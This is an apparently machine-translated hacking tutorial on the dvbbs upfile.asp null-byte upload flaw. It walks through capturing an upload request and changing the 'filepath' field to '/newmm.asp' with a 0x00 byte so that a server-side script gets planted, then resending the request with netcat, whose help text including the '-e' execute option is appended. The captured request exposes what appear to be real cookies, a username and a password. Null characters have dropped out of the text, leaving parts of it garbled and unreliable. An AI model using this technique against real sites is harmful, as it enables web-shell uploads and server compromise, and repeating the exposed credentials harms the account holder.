1: The principle of exploiting the vulnerability is only for asp and php scripts uploaded in form format*** nc (netcat) is used to submit data packages and run under the dos interface: nc -vv www.***.com 802: Vulnerability Principle The following example assumes that www host: www.***.com; bbs path: /bbs/ The vulnerability originates from the research on files uploaded to Dongwang. It is recommended that those with certain programming experience take a look at the upfile.asp file of dvbbs. It is not necessary to understand everything. Upfile is uploaded by generating a form. The variables used are as follows: filepath default value uploadface attribute hidden act default value upload attribute hidden file1 is the file you want to transfer. The key is the filepath variable! By default we Upload the file to www.***.com/bbs/uploadface/ The file is named after your upload time, which is the sentence filename=formpath&year(now)&month(now)&day(now)&hour(now) in upfile &minute(now)&second(now)&rannum&"."&fileext ------------------------------------- - We know that the data in the computer is "". Anyone who has used the C language knows that char data[]="bbs" The length of this data array is 4: b b s What will happen if we construct the filepath as follows? filepath= "/newmm.asp" The file we uploaded on 2004.09.24.08.24 will change and remain unchanged: _blank>http://www.***.com/bbs/uploadface/200409240824.jpg Use the filepath we constructed When: _blank>http://www.***.com/newmm.asp/200409240824.jpg In this way, when the server receives the filepath data, it detects what follows newmm.asp and understands that the filepath data is over. In this way, we upload Files, such as c:.asp, are saved as: _blank>http://www.***.com/newmm.asp 3: After the vulnerability was announced, many websites have done corresponding processing, but for filepath filtering and There are many websites that just add n variables with hidden attributes to deal with the upfile.exe published online, which is the upload vulnerability exploit tool or the filepath variable exploit tool (veteran's)... but the most basic ones have not been changed. . And there are similar vulnerabilities in the plug-ins of the website. What I want to say is not to rely on any special tools. Change the filepath variable in the package captured by wse yourself, and then submit it with nc. . . Even if he adds n hidden variables, it won't help. Of course, if filepath is strictly filtered, these theories of ours will come to an end, which is when our new theory will be born! 4: Detailed examples: ---------------- ----- 1. WSE packet capture result (save in 1.txt): post /bbs/upphoto/upfile.asp http/1.1 accept: image/gif, image/x-xbitmap, image/jpeg, image/ pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* referer: _blank>http://www.xin126.com/bbs/upphoto /upload.asp accept-language: zh-cn content-type: multipart/form-data; boundary=-----------7d423a138d0278 accept-encoding: gzip, deflate user-agent: mozilla/4.0 ( compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322) host: _blank>www.xin126.com content-length: 1969 connection: keep-alive cache-control: no-cache cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome= 1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84 --- --------------------------7d423a138d0278 content-disposition: form-data; name="filepath" ../medias/myphoto/ --- -----------------------------7d423a138d0278 ... ... Upload---------------7d423a138d0278 ------------------ 2. Open 1.txt with ultraedit and change the data: ...... ------------------ ------------7d423a138d0278 content-disposition: form-data; name="filepath" /newmm.asp█ www.xin126.com 80 16-bit representation: 0x00 or 00h In fact, when you change it, just add a 00 at the end of the filepath and it will be ok. Calculate the cookie length ===> After you change the fillepath, it must be either + or - the length of the cookies has changed... host : _blank>www.xin126.com content-length: 1969 Our solution is to make filepath a constant. . .This method is currently the most effective (I think) 2. Strengthen the processing of . It turns out that when we read here, it ends. We continue to read straight to the beginning of the next variable, and the processing is ok. Attachment: NC Usage: Monitoring external hosts nc [-options] hostname port[s] [ports] ... listen to local host nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -g num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent , ports scanned -l listen mode, for inbound connects -l listen harder, re-listen on socket close -n numeric-only ip addresses, no dns -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer telnet negotiation -u udp mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-i/o mode [used for scanning ] port numbers can be individual or ranges: m-n [inclusive]